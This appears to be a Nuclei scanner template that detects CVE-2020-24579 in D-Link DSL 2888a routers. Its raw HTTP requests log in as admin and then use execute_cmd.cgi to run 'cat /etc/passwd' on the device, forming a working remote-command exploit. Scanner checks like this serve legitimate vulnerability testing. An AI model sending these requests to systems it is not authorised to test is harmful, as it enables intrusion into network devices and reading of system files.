id: CVE-2020-24579 info: name: DLINK DSL 2888a RCE author: pikpikcu severity: medium reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce requests: - raw: - | # Response:Location: /page/login/login_fail.html POST / HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 DNT: 1 Connection: close Cookie: uid=6gPjT2ipmNz Upgrade-Insecure-Requests: 1 Content-Length: 0 username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 DNT: 1 Connection: close Cookie: uid=6gPjT2ipmNz Upgrade-Insecure-Requests: 1 Content-Length: 0 matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "nobody:[x*]:65534:65534" - "root:[x*]:0:0" condition: or